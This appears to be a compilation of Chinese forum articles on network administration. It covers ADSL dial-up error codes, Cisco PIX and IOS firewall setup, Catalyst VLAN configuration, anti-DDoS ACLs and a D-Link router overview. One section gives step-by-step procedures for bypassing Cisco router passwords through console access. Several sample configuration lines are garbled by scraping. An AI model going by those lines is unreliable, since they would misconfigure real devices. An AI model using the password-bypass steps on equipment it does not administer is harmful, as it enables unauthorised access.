Error 623 Cannot find the phone book entry
Error 624 Cannot write the phone book file
Error 625 Invalid information found in the phone book
问题：Windows NT 或者 Windows 2000 Server 网络RAS网络组件故障
原因：卸载所有PPPoE软件，重新安装RAS网络组件和RasPPPoE Error 630
问题：ADSL MODEM没有没有响应
原因：ADSL电话线故障，ADSL MODEM故障（电源没打开等）
解决：检查ADSL设备
Error 633
问题：拨号网络网络由于设备安装错误或正在使用，不能进行连接
原因：RasPPPoE没有完全和正确的安装
解决：卸载干净任何PPPoE软件，重新安装
Error 638
问题：过了很长时间，无法连接到ISP的ADSL接入服务器
原因：ISP服务器故障；在RasPPPoE所创建的不好连接中你错误的输入了一个电话号码
解决：运行其创建拨号的Raspppoe.exe检查是否能列出ISP服务，以确定ISP正常;把所使用的拨号连接中的 电话号码清除或者只保留一个0。
Error 645
问题：网卡没有正确响应
原因：网卡故障，或者网卡驱动程序故障
解决：检查网卡，重新安装网卡驱动程序
Error 650
问题：远程计算机没有响应，断开连接
原因：ADSL ISP 服务器故障，网卡故障，非正常关机造成网络协议出错
解决：检查ADSL信号灯是否能正确同步，致电ISP询问；检查网卡，删除所有网络组件重新安装网络。
Error 651
问题：ADSL MODEM报告发生错误
原因：Windows处于安全模式下，或其他错误
解决：出现该错误时，进行重拨，就可以报告出新的具体错误代码
Error 691
问题：输入的用户名和密码不对，无法建立连接
原因：用户名和密码错误，ISP服务器故障
解决：使用正确的用户名和密码，并且使用正确的ISP账号格式(name@service),致电ISP询问。
Error 718
问题：验证用户名时远程计算机超时没有响应，断开连接
原因：ADSL ISP 服务器故障
解决：致电ISP询问
Error 720
问题：拨号网络无法协调网络中服务器的协议设置
原因：ADSL ISP 服务器故障，非正常关机造成网络协议出错
解决：致电ISP询问，删除所有网络组件重新安装网络。
Error 734
问题：PPP连接控制协议中止
原因：ADSL ISP 服务器故障，非正常关机造成网络协议出错
解决：致电ISP询问，删除所有网络组件重新安装网络。
Error 738
问题：服务器不能分配IP地址
原因：ADSL ISP 服务器故障，ADSL用户太多超过ISP所能提供的IP地址
解决：致电ISP询问
Error 797
问题：ADSL MODEM连接设备没有找到
原因：ADSL MODEM电源没有打开，网卡和ADSL MODEM的连接线出现问题，软件安装以后相应的协议没有正确 邦定，在创立拨号连接时，建立了错误的空连接 解决：检查电源，连接线；检查网络属性，RasPPPoE相关的协议是否正确的安装并正确邦定（相关协议）， 检查网卡是否出现?号或!号，把它设置为Enable;检查拨号连接的属性，是否连接的设备使用了一个 “ISDN channel - Adapter Name (xx)” 的设备，该设备为一个空设备，如果使用了取消它，并 选择正确的PPPoE设备代替它，或者重新创立拨号连接。


Cisco防火墙技术汇总

《一键清理系统垃圾》

Cisco防火墙技术汇总

一、 集成在路由器中的防火墙技术

    1、 路由器IOS标准设备中的ACL技术

    ACL即Access Control Lis t(访问控制列表)，简称Access List(访问列表)，它是后续所述的IOS Firewall Feature Set的基础，也是Cisco全线路由器统一界面的操作系统IOS(Internet Operation System，网间操作系统)标准配置的一部分。这就是说在购买了路由器后，ACL功能已经具备，不需要额外花钱去买。

    2、 IOS Firewall Feature Set(IOS防火墙软件包)

    IOS Firewall Feature Set是在ACL的基础上对安全控制的进一步提升，由名称可知，它是一套专门针对防火墙功能的附加软件包，可通过IOS升级获得，并且可以加载到多个Cisco路由器平台上。

    目前防火墙软件包适用的路由器平台包括Cisco 1600、1700、2500、2600和3600，均属中、低端系列。对很多倾向与使用"all-in-one solution"(一体化解决方案)，力求简单化管理的中小企业用户来说，它能很大程度上满足需求。之所以不在高端设备上实施集成防火墙功能，这是为了避免影响大型网络的主干路由器的核心工作--数据转发。在这样的网络中，应当使用专用的防火墙设备。

    Cisco IOS防火墙特征:

    基于上下文的访问控制(CBAC)为先进应用程序提供基于应用程序的安全筛选并支持最新协议

    Java能防止下载动机不纯的小应用程序

    在现有功能基础上又添加了拒绝服务探测和预防功能，从而增加了保护

    在探测到可疑行为后可向中央管理控制台实时发送警报和系统记录错误信息

    TCP/UDP事务处理记录按源/目的地址和端口对跟踪用户访问

    配置和管理特性与现有管理应用程序密切配合

    二、 专用防火墙--PIX

    PIX(Private Internet eXchange)属于四类防火墙中的第四种--软硬件结合的防火墙，它的设计是为了满足高级别的安全需求，以较好的性能价格比提供严密的、强有力的安全防范。除了具备第四类防火墙的共同特性，并囊括了IOS Firewall Feature Set的应有功能。

    PIX成为Cisco在网络安全领域的旗舰产品已有一段历史了，它的软硬件结构也经历了较大的发展。现在的PIX有515和520两种型号(520系列容量大于515系列)，从原来的仅支持两个10M以太网接口，到10/100M以太网、令牌环网和FDDI的多介质、多端口(最多4个)应用;其专用操作系统从v5.0开始提供对 IPSec这一标准隧道技术的支持，使PIX能与更多的其它设备一起共同构筑起基于标准VPN连接。

    Cisco的PIX Firewall能同时支持16，000多路TCP对话，并支持数万用户而不影响用户性能，在额定载荷下，PIX Firewall的运行速度为45Mbps，支持T3速度，这种速度比基于UNIX的防火墙快十倍。

    主要特性:

    保护方案基于适应性安全算法(ASA)，能提供任何其它防火墙都不能提供的最高安全保护

    将获专利的"切入代理"特性能提供传统代理服务器无法匹敌的高性能

    安装简单，维护方便，因而降低了购置成本

    支持64路同时连接，企业发展后可扩充到16000路

    透明支持所有通用TCP/IP Internet服务，如万维网(WWW)文件传输协议(FTP)、Telnet、Archie、Gopher和rlogin

    支持多媒体数据类型，包括Progressive网络公司的Real Audio，Xing技术公司的Steamworks，White Pines公司腃USeeMe，Vocal Te公司的Internet Phone，VDOnet公司的VDOLive，Microsoft公司的NetShow和Uxtreme公司的Web Theater 2

    支持H323兼容的视频会议应用，包括Intel的Internet Video Phone和Microsoft的NetMeeting

    无需因安装而停止运行

    无需升级主机或路由器

    完全可以从未注册的内部主机访问外部Internet

    能与基于Cisco IOS的路由器互操作

    三、 两种防火墙技术的比较

    IOS FIREWALL FEATURE SET PIX FIREWALL

    网络规模 中小型网络，小于250节点的应用。 大型网络，可支持多于500用户的应用

    工作平台 路由器IOS操作系统 专用PIX工作平台

    性能 最高支持T1/E1(2M)线路 可支持多条T3/E3(45M)线路

    工作原理 基于数据包过滤，核心控制为CBAC 基于数据包过滤，核心控制为ASA

    配置方式 命令行或图形方式(通过ConfigMaker) 命令行方式或图形方式(通过Firewall Manager)

    应用的过滤 支持Java小程序过滤 支持Java小程序过滤

    身份认证 通过IOS命令，支持TACACS+、RADIUS服务器认证。 支持TACACS+、RADIUS集中认证

    虚拟专网(VPN) 通过IOS软件升级可支持IPSec、L2F和GRE隧道技术，支持40或56位DES加密。 支持Private Link或IPSec隧道和加密技术。

    网络地址翻译(NAT) 集成IOS Plus实现 支持

    冗余特性 通过路由器的冗余协议HSRP实现 支持热冗余

    自身安全 支持Denial-of-Service 支持Denial-of-Service

    代理服务 无，通过路由器的路由功能实现应用 切入的代理服务功能

    管理 通过路由器的管理工具，如Cisco Works 通过Firewall Manager实现管理

    审计功能 一定的跟踪和报警功能 状态化数据过滤，可通过Firewall Manager实现较好的额监控、报告功能

    四、 Centri防火墙

    主要特性:

    核心代理体系结构

    针对Windows NT定制TCP/IP栈

    图形用户结构可制订安全政策

    可将安全政策拖放到网络、网络组、用户和用户组

    ActiveX、Java小应用程序、Java和Vb模块

    通用资源定位器(URL)模块

    端口地址转换

    网络地址转换

    透明支持所有通用TCP/IP应用程序，包括WWW、文件传输协议(FTP)Telnet和邮件

    为Web、Telnet和FTP提供代理安全服务

    根据IP地址、IP子网和IP子网组进行认证

    使用sl口令和可重复使用口令Telnet、Web和ftp提供联机用户认证

    使用Windows NT对所有网络服务进行带外认证

    防止拒绝服务型攻击，包括SYN Flood、IP地址哄骗和Ping-of-Death

    五、Cisco PIX防火墙的安装流程

    1. 将PIX安放至机架，经检测电源系统后接上电源，并加电主机。

    2. 将CONSOLE口连接到PC的串口上，运行HyperTerminal程序从CONSOLE口进入PIX系统;此时系统提示pixfirewall>。

    3. 输入命令:enable,进入特权模式，此时系统提示为pixfirewall#。

    4. 输入命令: configure terminal,对系统进行初始化设置。

    5. 配置以太口参数:

    interface ethernet0 auto (auto选项表明系统自适应网卡类型 )interface ethernet1 auto

    6. 配置内外网卡的IP地址:

    ip address inside ip_address netmask

    ip address outside ip_address netmask

    7. 指定外部地址范围:

    global 1 ip_address-ip_address

    8. 指定要进行要转换的内部地址:

    nat 1 ip_address netmask

    9. 设置指向内部网和外部网的缺省路由

    route inside 0 0 inside_default_router_ip_address

    route outside 0 0 outside_default_router_ip_address

    10. 配置静态IP地址对映:

    static outside ip_address inside ip_address

    11. 设置某些控制选项:

    conduit global_ip port protocol foreign_ip global_ip 指的是要控制的地址

    port 指的是所作用的端口，其中0代表所有端口

    protocol 指的是连接协议，比如:TCP、UDP等

    foreign_ip 表示可访问global_ip的外部ip，其中表示所有的ip。

    12. 设置telnet选项:

    telnet local_ip

    local_ip 表示被允许通过telnet访问到pix的ip地址(如果不设此项， PIX的配置只能由consle方式进行)。

    13. 将配置保存:

    wr mem

    14. 几个常用的网络测试命令:

    #ping

    #show interface 查看端口状态

    #show static 查看静态地址映射

    六、PIX与路由器的结合配置

    (一)、PIX防火墙

    1、设置PIX防火墙的外部地址:

    ip address outside 131.1.23.2

    2、设置PIX防火墙的内部地址:

    ip address inside 10.10.254.1

    3、设置一个内部计算机与Internet上计算机进行通信时所需的全局地址池:

    global1 131.1.23.10-131.1.23.254

    4、允许网络地址为10.0.0.0的网段地址被PIX翻译成外部地址:

    nat 110.0.0.0

    5、网管工作站固定使用的外部地址为131.1.23.11:

    static 131.1.23.11 10.14.8.50

    6、允许从RTRA发送到到网管工作站的系统日志包通过PIX防火墙:

    conduit 131.1.23.11514 udp 131.1.23.1 255.255.255.255

    7、允许从外部发起的对邮件服务器的连接(131.1.23.10):

    mailhost 131.1.23.10 10.10.254.3

    8、允许网络管理员通过远程登录管理IPX防火墙:

    telnet 10.14.8.50

    9、在位于网管工作站上的日志服务器上记录所有事件日志:

    syslog facility 20.7

    syslog host 10.14.8.50

    (二)、路由器RTRA

    RTRA是外部防护路由器，它必须保护PIX防火墙免受直接攻击，保护FTP/HTTP服务器，同时作为一个警报系统，如果有人攻入此路由器，管理可以立即被通知。

    1、阻止一些对路由器本身的攻击

    no service tcps mall-servers

    2、强制路由器向系统日志服务器发送在此路由器发生的每一个事件

BR>logging trapde bugging

    3、此地址是网管工作站的外部地址，路由器将记录所有事件到此主机上:

    logging 131.1.23.11

    4、保护PIX防火墙和HTTP/FTP服务器以及防卫欺骗攻击(见存取列表):

    enable secret xxxxxxxxxxx

    interface Ethernet 0

    ipaddress 131.1.23.1 255.255.255.0

    interfaceSerial 0

    ip unnumbered ethernet 0

    ip access-group 110 in

    5、禁止任何显示为来源于路由器RTRA和PIX防火墙之间的信息包，这可以防止欺骗攻击:

    access-list 110 deny ip 131.1.23.0 0.0.0.255 anylog

    6、防止对PIX防火墙外部接口的直接攻击并记录到系统日志服务器任何企图连接PIX防火墙外部接口的事件:

    access-list 110 deny ip any host 131.1.23.2 log

    7、允许已经建立的TCP会话的信息包通过:

    access-list 110 permit tcp any 131.1.23.0 0.0.0.255 established

    8、允许和FTP/HTTP服务器的FTP连接:

    access-list 110 permit tcp any host 131.1.23.3 eq ftp

    9、允许和FTP/HTTP服务器的FTP数据连接:

    access-list 110 permit tcp any host 131.1.23.2 eq ftp-data

    10、允许和FTP/HTTP服务器的HTTP连接:

    access-list 110 permit tcp any host 131.1.23.2 eq www

    11、禁止和FTP/HTTP服务器的别的连接并记录到系统日志服务器任何企图连接FTP/HTTP的事件:

    access-list 110 deny ip any host 131.1.23.2 log

    12、允许其他预定在PIX防火墙和路由器RTRA之间的流量:

    access-list 110 permit ip any 131.1.23.0 0.0.0.255

    13、限制可以远程登录到此路由器的IP地址:

    line vty 0 4

    login

    password xxxxxxxxxx

    access-class 10 in

    14、只允许网管工作站远程登录到此路由器，当你想从Internet管理此路由器时，应对此存取控制列表进行修改:

    access-list 10 permit ip 131.1.23.11

    (三)、路由器RTRB

    RTRB是内部网防护路由器，它是你的防火墙的最后一道防线，是进入内部网的入口。

    1、记录此路由器上的所有活动到网管工作站上的日志服务器，包括配置的修改

    logging trap debugging

    logging 10.14.8.50

    2、允许通向网管工作站的系统日志信息:

    interface Ethernet 0

    ip address 10.10.254.2 255.255.255.0

    no ip proxy-arp

    ip access-group 110 in

    access-list 110 permit udp host 10.10.254.0 0.0.0.255

    3、禁止所有别的从PIX防火墙发来的信息包:

    access-list 110 deny ip any host 10.10.254.2 log

    4、允许邮件主机和内部邮件服务器的SMTP邮件连接:

    access-list permit tcp host 10.10.254.31 0.0.0.0 0.255.255.255 eq smtp

    5、禁止别的来源与邮件服务器的流量:

    access-list deny ip host 10.10.254.31 0.0.0.0 0.255.255.255

    6、防止内部网络的信任地址欺骗:

    access-list deny ip any 10.10.254.0 0.0.0.255

    7、允许所有别的来源于PIX防火墙和路由器RTRB之间的流量:

    access-list permit ip 10.10.254.0 0.0.0.255 10.0.0.0 0.255.255.255

    8、限制可以远程登录到此路由器上的IP地址:

    line vty 0 4

    login

    password xxxxxxxxxx

    access-class 10 in

    9、只允许网管工作站远程登录到此路由器，当你想从Internet管理此路由器时，应对此存取控制列表进行修改:

    access-list 10 permit ip 10.14.8.50

    按以上设置配置好PIX防火墙和路由器后，PIX防火墙外部的攻击者将无法在外部连接上找到可以连接的开放端口，也不可能判断出内部任何一台主机的IP地址，即使告诉了内部主机的IP地址，要想直接对它们进行Ping和连接也是不可能的。这样就可以对整个内部网进行有效的保护。
--------------------------------------------------------------------------------

《我是网管》论坛，打造中国网管第一品牌！


Cisco交换机设置点滴

《一键清理系统垃圾》

Cisco交换机设置点滴

交换机虚拟网(Virtual LANs)的设置:
Catalyst 5000上实现VLAN划分及外部VLAN路由设置
分配VTP域(a VTP Domain)
将Cat5000加入域
指定中继端口(a Trunk)
Dynamic ISL
分配VLAN到端口
设置VLAN 20
配置Router

-------------------------------------------------------------------

注:存在三个VLAN,在VLAN之间通过Router做路由.
-----------------------------------------------------------------

分配VTP域
什么是VTP?
VTP是VLAN Trunk Protocol的简写,它提供每个设备 (router 或 LAN-switch)在中继端口(trunk ports)发送广播. 这些广播被发送到一个组播地址,并被所有相邻设备接收. 这些广播列出了发送设备的管理域,它的配置修订号,已知的VLAN, 及已知VLAN的确定参数.通过听这些广播,在相同管理域的所有设备都可以学习到在发送设备上配置的新的VLAN.使用这种方法,新的 VLAN只需要在管理域内的一台设备上建立和配置.信息会自动被相同管理域内的其它设备学到.

分配VTP域
首先分配VTP域名(a VTP domain name),在相同管理域内的交换机可以通过VTP协议互相学习VTP信息.

Cat5001> (enable) sho vtp domain
Domain Name Domain Index VTP Version Local Mode
-------------------------------- ------------ ----------- -----------
1 1 server

Advt Interval Vlan-count Max-vlan-storage Config Revision SNMP Traps
------------- ---------- ---------------- --------------- -----------
300 5 256 0 disabled

Last Updater
---------------
0.0.0.0
Cat5001> (enable)
Cat5001> (enable) set vtp domain cisco
VTP domain cisco modified
Cat5001> (enable) sho vtp domain
Domain Name Domain Index VTP Version Local Mode
-------------------------------- ------------ ----------- -----------
cisco 1 1 server

Advt Interval Vlan-count Max-vlan-storage Config Revision SNMP Traps
------------- ---------- ---------------- --------------- -----------
300 5 256 0 disabled

Last Updater
---------------
0.0.0.0
Cat5001> (enable)
--------------------------------------------------------------------------------

将Catalyst 5002加入域
需要将Catalyst 5002加入名为cisco的VTP管理域, 并设为VTP client,它将接收来自VTP server 的VTP配置及更新.

注意:Catalyst 5000系列交换机默认为VTP server.

cat5002> (enable)
cat5002> set vtp domain cisco mode client

指定中继端口(Trunk ports)
VLAN Trunk协议(VTP)只在中继口(ISL , LANE 和802.10)上传输,应在二个Catalyst5000

交换机间定义哪个口作为中继端口(Trunk port).

Inter-Switch Link (ISL) 中继用于Fast Ethernet和Gigabit Ethernet端口
IEEE 802.10中继用于FDDI/CDDI端口
LAN Emulation (LANE) 中继用于ATM 端口

Cat5001> (enable) set trunk 1/1 on
Port 1/1 mode set to on.
Cat5001> (enable)
Wed Jun 19 1996, 15:00:02 Port 1/1 has become trunk.

--------------------------------------------------------------------------------

Dynamic ISL
有了DISL(Dynamic ISL), 你不需要修改远端的Catalyst 5000;以下信息将显示在远端的Catalyst 5000.

Wed Jun 19 1996, 15:51:59 Port 1/2 has become trunk.

Cat5001> (enable) sho trunk
Port Mode Status
------- --------- ------------
1/1 on trunking
1/2 auto not-trunking
2/1-2 off not-trunking
5/1 auto not-trunking
5/2 auto not-trunking
5/3 auto not-trunking
5/4 auto not-trunking
5/5 auto not-trunking
5/6 auto not-trunking
5/7 auto not-trunking
5/8 auto not-trunking
5/9 auto not-trunking
5/10 auto not-trunking
5/11 auto not-trunking
5/12 auto not-trunking

Port Vlans allowed
------- ---------------------------------------------------------------------
1/1 1-1000
1/2 1-1000
2/1-2 1-1000
5/1 1-1000
5/2 1-1000
5/3 1-1000
5/4 1-1000
5/5 1-1000
5/6 1-1000
5/7 1-1000
5/8 1-1000
5/9 1-1000
5/10 1-1000
5/11 1-1000
5/12 1-1000

Port Vlans active
------- ---------------------------------------------------------------------
1/1 1
1/2 1
2/1-2 1
5/1 1
5/2 1
5/3 1
5/4 1
5/5 1
5/6 1
5/7 1
5/8 1
5/9 1
5/10 1
5/11 1
5/12 1

注意: DISL在Cisco IOS软件中不支持.
--------------------------------------------------------------------------------

分配VLAN到端口
Cat5001> (enable) set vlan 2 3/2-20
VLAN 2 modified.
VLAN 1 modified.
VLAN Mod/Ports
---- -----------------------
2 1/1
3/2-20

Cat5001> (enable) set vlan 20 5/1-6
VLAN 20 modified.
VLAN 1 modified.
VLAN Mod/Ports
---- -----------------------
20 1/1
5/1-6

Configure additional information for VLAN 20.

On the other Catalyst 5000 :

Cat5002> (enable) set vlan 2 4/1-2,5/6-12
VLAN 2 modified.
VLAN 1 modified.
VLAN Mod/Ports
---- -----------------------
2 1/2
4/1-3,4/5-23
5/6-12

Configure additional information for VLAN 20.

Cat5002> (enable) set vlan 20 5/1-5
VLAN 20 modified.
VLAN 1 modified.
VLAN Mod/Ports
---- -----------------------
20 1/2
5/1-5

Configure VLAN 20 on a VTP server.

--------------------------------------------------------------------------------

显示端口配置
Cat5001> (enable) show port
Port Name Status Vlan Level Duplex Speed Type
---- -------------------- ---------- ---------- ------ ------ ----- -----------
1/1 connected 1 normal half 100 100BaseTX
1/2 connected trunk normal half 100 100BaseTX
2/1 connecting 1 normal half 100 FDDI
2/2 connected 1 normal half 100 FDDI
4/1 inactive 2 normal half 10 10BaseT
4/2 inactive 2 normal half 10 10BaseT
4/3 inactive 2 normal half 10 10BaseT
4/4 notconnect 1 normal half 10 10BaseT
4/5 inactive 2 normal half 10 10BaseT
4/6
此时, VLAN 2 和VLAN 20 还未激活.所以在VLAN 2和VLAN 20的端口是inactive状态.

--------------------------------------------------------------------------------

设置VLAN 20
如果在网络里有VTP server和VTP clent,请在VTP server上设置VLAN 20

Cat5001> (enable) set vlan 20
VLAN 20 modified

这将激活在所有管理域cisco内的VLAN 20

Cat5001> (enable) sho vlan 20
VLAN Name Status Mod/Ports
---- -------------------------------- --------- ----------------------------
20 VLAN0020 active 1/1
5/1-6

VLAN Type SAID MTU Parent RingNo BridgeNo Stp Trans1 Trans2
---- ----- ---------- ----- ------ ------ -------- ---- ------ ------
20 enet 100020 1500 - - - - 0 0

--------------------------------------------------------------------------------

配置Router
conf t
interface FastEthernet0/0.1 <-- you need to create a sub-interface by vlan.
encapsulation isl 20 <-- 20 is the vlan number.

ip address 1.1.1.1 255.255.255.0
interface FastEthernet0/0.2
encapsulation isl 2
ip address 2.2.2.1 255.255.255.0
interface FastEthernet0/0.3
encapsulation isl 1
ip address 172.16.80.1 255.255.255.0

Router eigrp 666
network 1.0.0.0
network 2.0.0.0
network 172.16.80.0
end

writ mem

返回


CISCO路由器口令恢复

《一键清理系统垃圾》

CISCO路由器口令恢复

    本人在管理本机关局域网和系统广域网时，碰到过一次由于一段时间在外学习回到单位后，发现路由器的口令忘记而又没有记录下来的情形，当然经过一番周折最终解决了问题。现在将该过程归纳总结，希望对各位同仁能有所帮助。
    下面这段文字解释了关于CISCO路由器或交换机几种恢复口令的方法，可以在大多数不改变硬件跳线的情况下完成口令的恢复，但是所有情况都需要重新启动路由器。口令恢复仅仅能够从物理Console口连到路由器上才可以做到。
    当路由器的口令不幸被忘记或丢失，可以通过查看、改变口令而恢复口令，如果是新设备则可以删除原有配置重新开始。每种口令恢复方法大致有以下几个基本步骤:
    1.不读内存重启路由器进行配置，这种有时被称为测试系统模式、ROM模式或boot引导模式；2.重新启动系统；3.进入特权模式 (如你在测试系统模式，没有口令可以进入)；4.查看、改变口令或删除原配置；5.象平常一样重新配置路由器后引导；6.重新启动系统。
    有时在进行口令恢复时需要终端给出一个BREAK信号，这要求你必须熟悉终端或PC仿真终端怎样给出这个信号。例如:Alt+B可产生一个BREAK信号，在Windows终端上按Break或Ctrl+Break，Windows终端上也可以定义一个作为BREAK功能键，通过按功能键来获得一个BREAK信号，选择特定字符^$B(Shift 6, Shift 4,和大写字母B)定义一个作为BREAK信号。
    下面详细介绍给定Cisco路由器的口令恢复方法。
    口令恢复方法一
    可采用该方法的相关设备有Cisco 2000系列，Cisco 2500系列，Cisco 3000系列，基于680x0 Cisco 4000系列以及在ROM中运行Cisco IOS 10.0以上版本的 Cisco 7000系列。而对于Cisco 7000和Cisco 7010的路由器而言，这种方法仅当Cisco 7000和Cisco 7010的路由器安装了RP卡时才能用。它可以引导Cisco闪存IOS 10.0软件，但需要处理器卡上的实际ROM。
    1. 连接路由器的console口到终端或PC仿真终端。用无modem的直连线连接PC的串行口到路由器的console口；
    2. 用show version命令显示并记录配置寄存器的值，通常为0x2102或0x102.如果用show version命令不能获得有关提示，可以查看类似的路由器来获得配置寄存器的值或用0x2102试试；
    3.关闭路由器的电源，然后再打开；
    4.在启动的前60秒内按Break键，你将会看到“〉”提示符(无路由器名)，如果没有看到“〉”提示符，说明你没有正确发出Break信号，这时可检查终端或仿真终端的设置；
    5.在“〉”提示符下键入 o/r 0x42从Flash memory中引导或键入o/r 0x41从ROM中引导(注意：这里“o”是小写字母“O”)。如果它有Flash且原封没动过，0x42是最好的设置，因为它是缺省值，仅当Flash被擦除或没有安装时使用0x41。如果用0x41，你可以查看或删除原配置，但你不能改变口令；
    6. 在“〉”提示符下键入i，路由器将重新启动而忽略它保存的配置；
    7. 在设置中的所有问题都回答“no”；
    8. 在Router〉提示符下键入enable，你将进入特权用户Router#提示；
    9. 选择下列三选项之一：
    查看口令，键入 show config
    改变口令(在口令加密情况下)，作：
    a.键入config mem拷贝NVRAM到memory中；b.键入wr term；c.如果你作过enable secret xxxx, 执行下列命令：键入config term然后键入enable secret按Ctrl+Z；如果你没有作过enable secret xxxx,则键入enable password，Press Ctrl+Z；d.键入write mem提交保存改变；若删除配置，键入write erase；
    10.在Router#提示符下键入config term；
    11.键入config-register0x2102，或键入在第二步记录的值；
    12.按 Ctrl+Z退出编辑；
    13.在Router#提示符下键入reload命令，你不需要做write memory。
    口令恢复方法二
    可采用本方法的相关设备有Cisco 1003系列，Cisco 4500系列，基于IDT Orion处理器Cisco 3600系列，基于Motorola 860系列处理器Cisco 2600系列。
    下面是相应步骤：
    1. 连接路由器的console口与终端或PC仿真终端；
    2. 用show version命令显示并记录配置寄存器的值，通常为 0x2102或 0x102；
    3. 关闭路由器的电源，然后再打开；
    4. 在启动的前60秒内按 Break键，你将会看到rommon〉提示符(无路由器名)， 如果没有说明你没有正确发出Break信号，这时可检查终端或仿真终端的设置；
    5. 在rommon〉提示符下键入confreg；
    6. Do you wish to change configuration[y/n]？提示时，回答y；
    7.所有问题回答n直到你到达ignore system config info[y/n]？提示时，回答y；
    8.剩余问题回答n直到你到达change boot characteristics[y/n]？提示时，回答y；
    9.在进入boot: 提示时，type 2需进行返修；如果Flash被擦除，type 1，如果所有Flash均被擦除，4500路由器必须还回到Cisco服务中心处理。如果你用“1”，你可以查看或删除旧配置，你不能改变口令；
    10.当出现配置问题，Do you wish to change configuration[y/n]？提示时，回答no；
    11. 在rommon〉提示符下键入reset，或重新启动（power-cycle）4500或7500；
    12. 在它引导起来后，对所有的设置均回答no；
    13.在Router〉提示下键入enable，你将进入特权模式看到Router#提示；
    Cisco Catalyst交换机、老的Cisco路由器和通信服务器的口令恢复过程可在www.cisco.com/warp/customer/701/22.htm找到。

返回


Cisco路由器上如何防止DDoS

《一键清理系统垃圾》

Cisco路由器上如何防止DDoS

    Cisco路由器上防止分布式拒绝服务（DDoS）攻击的一些建议

    1、使用 ip verfy unicast reverse-path 网络接口命令
    这个功能检查每一个经过路由器的数据包。在路由器的CEF（Cisco Express Forwarding）表该数据包所到达网络接口的所有路由项中，如果没有该数据包源IP地址的路由，路由器将丢弃该数据包。例如，路由器接收到一个源IP地址为1.2.3.4的数据包，如果CEF路由表中没有为IP地址1.2.3.4提供任何路由（即反向数据包传输时所需的路由），则路由器会丢弃它。

    单一地址反向传输路径转发（Unicast Reverse Path Forwarding）在ISP（局端）实现阻止SMURF攻击和其它基于IP地址伪装的攻击。这能够保护网络和客户免受来自互联网其它地方的侵扰。使用Unicast RPF需要打开路由器的"CEF swithing"或"CEF distributed switching"选项。不需要将输入接口配置为CEF交换（switching）。只要该路由器打开了CEF功能，所有独立的网络接口都可以配置为其它交换（switching）模式。RPF（反向传输路径转发）属于在一个网络接口或子接口上激活的输入端功能，处理路由器接收的数据包。
在路由器上打开CEF功能是非常重要的，因为RPF必须依靠CEF。Unicast RPF包含在支持CEF的Cisco IOS 12.0及以上版本中，但不支持Cisco IOS 11.2或11.3版本。

    2、使用访问控制列表（ACL）过滤RFC 1918中列出的所有地址

    参考以下例子：

    interface xy
    ip access-group 101 in
    access-list 101 deny ip 10.0.0.0 0.255.255.255 any
    access-list 101 deny ip 192.168.0.0 0.0.255.255 any
    access-list 101 deny ip 172.16.0.0 0.15.255.255 any
    access-list 101 permit ip any any

    3、参照RFC 2267，使用访问控制列表（ACL）过滤进出报文

    参考以下例子：

    {ISP中心} -- ISP端边界路由器 -- 客户端边界路由器 -- {客户端网络}

    ISP端边界路由器应该只接受源地址属于客户端网络的通信，而客户端网络则应该只接受源地址未被客户端网络过滤的通信。以下是ISP端边界路由器的访问控制列表（ACL）例子：

    access-list 190 permit ip {客户端网络} {客户端网络掩码} any
    access-list 190 deny ip any any [log]

    interface {内部网络接口} {网络接口号}
    ip access-group 190 in

    以下是客户端边界路由器的ACL例子：

    access-list 187 deny ip {客户端网络} {客户端网络掩码} any
    access-list 187 permit ip any any

    access-list 188 permit ip {客户端网络} {客户端网络掩码} any
    access-list 188 deny ip any any

    interface {外部网络接口} {网络接口号}
    ip access-group 187 in
    ip access-group 188 out

    如果打开了CEF功能，通过使用单一地址反向路径转发（Unicast RPF），能够充分地缩短访问控制列表（ACL）的长度以提高路由器性能。为了支持Unicast RPF，只需在路由器完全打开CEF；打开这个功能的网络接口并不需要是CEF交换接口。

    4、使用CAR（Control Access Rate）限制ICMP数据包流量速率

    参考以下例子：

    interface xy
    rate-limit output access-group 2020 3000000 512000 786000 conform-action
    transmit exceed-action drop

    access-list 2020 permit icmp any any echo-reply

    请参阅IOS Essential Features 获取更详细资料。

    5、设置SYN数据包流量速率

    interface {int}
    rate-limit output access-group 153 45000000 100000 100000 conform-action
    transmit exceed-action drop
    rate-limit output access-group 152 1000000 100000 100000 conform-action
    transmit exceed-action drop

    access-list 152 permit tcp any host eq www
    access-list 153 permit tcp any host eq www established

    在实现应用中需要进行必要的修改，替换：

    45000000为最大连接带宽
    1000000为SYN flood流量速率的30%到50%之间的数值。
    burst normal（正常突变）和 burst max（最大突变）两个速率为正确的数值。

    注意，如果突变速率设置超过30%，可能会丢失许多合法的SYN数据包。使用"show interfaces rate-limit"命令查看该网络接口的正常和过度速率，能够帮助确定合适的突变速率。这个SYN速率限制数值设置标准是保证正常通信的基础上尽可能地小。

    警告：一般推荐在网络正常工作时测量SYN数据包流量速率，以此基准数值加以调整。必须在进行测量时确保网络的正常工作以避免出现较大误差。

    另外，建议考虑在可能成为SYN攻击的主机上安装IP Filter等IP过滤工具包。

    6、搜集证据并联系网络安全部门或机构

    如果可能，捕获攻击数据包用于分析。建议使用SUN工作站或Linux等高速计算机捕获数据包。常用的数据包捕获工具包括TCPDump和snoop等。基本语法为：

    tcpdump -i interface -s 1500 -w capture_file

    snoop -d interface -o capture_file -s 1500

    本例中假定MTU大小为1500。如果MTU大于1500，则需要修改相应参数。将这些捕获的数据包和日志作为证据提供给有关网络安全部门或机构。

返回


D-Link路由器DI-1162

《一键清理系统垃圾》

D-Link路由器DI-1162

    提起D-Link的广域网络设备，就让人想起它的DI-1180系列远程访问服务器、DI-300系列ISDN路由器、DI-1150路由器。最近，D-Link又推出了一款新型路由器DI-1162。DI-1162与DI-1150相比，是一款功能更强的路由器。它的主要特点如下：

    (1)使用方便，易于管理。在系统管理方面，DI-1162采用菜单模式的画面设置，提供MIB2及专用MIB，可使用SNMP Manager 或专用配置软件来管理DI-1162 路由器。您还可以通过DI-1162前面板提供的Console口，或通过Telnet来管理配置。

    (2)可扩展性。DI-1162提供一个可扩充插槽，目前可提供10/100M局域网和RS-530广域网模块。因此，使用者可以将系统升级为两个局域网端口及两个广域网端口，或者一个局域网端口加四个广域网端口。第二个10/100Mbps局域网端口可以提供一个高速的广域网连接，例如：可经由ADSL Modem或Cable Modem连接ISP。两个RS-530广域网络接口模块，可以提供更多的专线连接、拨号连接和提供远程访问功能。

    (3)远程访问。当远程访问用户通过Modem拨号进入网络时，DI-1162可以自动指定IP位址给远程访问用户。

    (4)一机多用。DI-1162可以用于局域网上Internet，也可用于远程访问，还可以用于局域网互联。

